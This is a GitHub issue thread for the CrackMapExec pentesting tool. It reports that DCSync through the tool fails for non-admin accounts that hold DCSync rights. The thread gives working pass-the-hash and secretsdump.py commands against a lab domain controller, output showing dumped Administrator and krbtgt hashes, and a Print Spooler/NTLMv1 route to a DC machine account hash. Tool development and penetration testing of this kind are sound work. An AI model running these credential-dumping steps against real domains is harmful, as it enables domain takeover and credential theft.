search

byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.45k stars 1.64k forks source link

DCSync privileges only works if a user is an admin #407

Closed sebrink closed 4 years ago

sebrink commented 4 years ago

Describe the bug An account with DCSync Privileges can not utilize these privileges unless they are an admin.

To Reproduce

An example of the machine account with DCSync privileges being unable to do a DCSync.

root@wpad:~# cme smb BART.sim.local -u 'BART$' -H 'f80819837d5170c19b056a5547d58423'
SMB         10.10.10.200    445    BART             [*] Windows Server 2019 Standard Evaluation 17763 x64 (name:BART) (domain:sim.local) (signing:True) (SMBv1:True)
SMB         10.10.10.200    445    BART             [+] sim.local\BART$ f80819837d5170c19b056a5547d58423 
root@wpad:~# cme smb BART.sim.local -u 'BART$' -H 'f80819837d5170c19b056a5547d58423' --ntds drsuapi
SMB         10.10.10.200    445    BART             [*] Windows Server 2019 Standard Evaluation 17763 x64 (name:BART) (domain:sim.local) (signing:True) (SMBv1:True)
SMB         10.10.10.200    445    BART             [+] sim.local\BART$ f80819837d5170c19b056a5547d58423

An example of doing the same thing with secretsdump.py, but successfully doing a DCSync.

root@wpad:~/impacket/examples# python3 secretsdump.py -hashes ':f80819837d5170c19b056a5547d58423' 'BART$@BART.sim.local'
Impacket v0.9.22.dev1+20200804.145312.110b886c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf4eafe7c79bd8d3a14891e5a8561e54:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a3af955c3eb36b1494dbed80c28e060:::

Crackmapexec info

Additional context Maybe add an override flag for when a user knows their user can do this?

mpgn commented 4 years ago

Hello,

I'm wondering in which case you can have a user with DCSync priv without being an admin ?

sebrink commented 4 years ago

The computer account of domain controllers by default have DCSync privileges and are not local admins to the machine.

During a pentest it's common to get the NTLM of a DC machine account from the Print Spooler Bug in conjunction with NTLMv1 being enabled in the environment (https://github.com/NotMedic/NetNTLMtoSilverTicket).

mpgn commented 4 years ago

Agreed, I will do it then ! :+1: